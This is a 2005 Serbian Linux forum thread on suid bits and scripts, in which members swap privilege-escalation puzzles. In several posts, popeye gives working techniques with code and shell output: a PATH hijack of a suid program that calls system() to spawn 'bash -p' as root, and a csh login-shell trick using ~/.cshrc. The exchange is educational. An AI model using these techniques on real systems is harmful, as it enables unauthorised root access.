Početak›Forumi›Linuks›Opšte Linuks diskusije›Suid bit i tekstualne datoteke
- This topic has 51 odgovor, 9 glasova, and was last updated 17 years, 10 months ranije by
maddox.
-
AutorČlanci
-
1. decembra 2005. u 9:55 pm #37912
japan
Učesnikuh… predajem se… 😆
kako prevariti strcmp() ?
1. decembra 2005. u 10:19 pm #37913popeye
Glavni majstorTražio si zeca u pogrešnom grmu. 😉
ifconfig:[code]#!/bin/bash -p
. /bin/bash -p[/code]
$ vi ifconfig
$ chmod 755 ifconfig
$ PATH=”.” ./a.out eth0
# id
uid=1000(popeye) gid=1000(popeye) euid=0(root)1. decembra 2005. u 10:27 pm #37914popeye
Glavni majstorza ovo već nisam siguran, možda neki ” ili tako nešto…
Nije mi cilj bio da pričam o prelivanju bafera, to je malo duža (i komplikovanija za neupućene) tema. Ovo oko skripti, odnosno system() funkcije, je lakše za poimanje.
1. decembra 2005. u 10:44 pm #37915japan
UčesnikTražio si zeca u pogrešnom grmu. 😉
znao sam da je neka koska 😛
nije ni prelivanje bafera mnogo teško za shvatiti, samo je potrebno znati kako funkcioniše izvršavanje programa na nivou procesora… a to se uz dobru literaturu lako da naučiti…
1. decembra 2005. u 10:57 pm #37916popeye
Glavni majstorMa stoji da je prosto, ali ni ovde se niko ne javlja. Pre nekog vremena je neko jednom tražio otvaranje foruma “Sigurnost” i tom prilikom sam odgovorio da za takvim forumom nema dovoljno korisnika koji bi učestvovali u nekoj normalnoj diskusiji. Danas sam malo zaludniji pa iskoristih ovu temu da vidim kako stoje stvari.
1. decembra 2005. u 11:10 pm #37917LimitMan
UčesnikMene zanima … Mada stvarno nemam snage za vecu raspravu (neispavan, radio previse i sl…). Samo vas gledam i iskreno … saznajem neke nove stvari 😉 Mada je dosta tu i starih …
1. decembra 2005. u 11:14 pm #37918popeye
Glavni majstorznao sam da je neka koska 😛
Hehe, ima puna korpa koski.
Šta misliš, u čemu je problem u ovoj skripti:
[code]#!/bin/csh
echo “Test!”[/code]
Pod pretpostavkom da je je vlasnik root, dozvole su 4755 i sistem poštuje suid bit na skripti, može li se dobiti root shell?
1. decembra 2005. u 11:24 pm #37919LimitMan
Učesnikzaista ne vidim kako bi “Hello world” primer mogao da bude access to root preko suid-a …
Ako je to moguce … onda je sve moguce 😀
1. decembra 2005. u 11:45 pm #37920japan
Učesnikpomoslio sam da je dovoljno uraditi isto što i malopre, ali izgleda da nije…
2. decembra 2005. u 1:32 am #37921popeye
Glavni majstor~/.cshrc:
[code]/bin/bash -p[/code]pokretac.c:
[code]#includeint main() {
execl(“test.sh”,”-“,0);
return 0;}
[/code]$ vi ~/.cshrc
$ vi pokretac.c
$ make pokretac
$ ./pokretac.c
$ ps
PID TTY TIME CMD
26292 pts/0 00:00:00 bash
26370 pts/0 00:00:00 test.sh
26371 pts/0 00:00:00 bash
26380 pts/0 00:00:00 psKao što vidiš, dve instance bash školjke su pokrenute. Izlaskom iz tako dobijenog shella, izvršava se test.sh (ispisuje se “Test!”). Kada bi sistem dozvolio suid za skriptu, ovo bi trebao biti root shell.
-
AutorČlanci
Moraš biti prijavljen da bi postavio komentar u ovoj temi.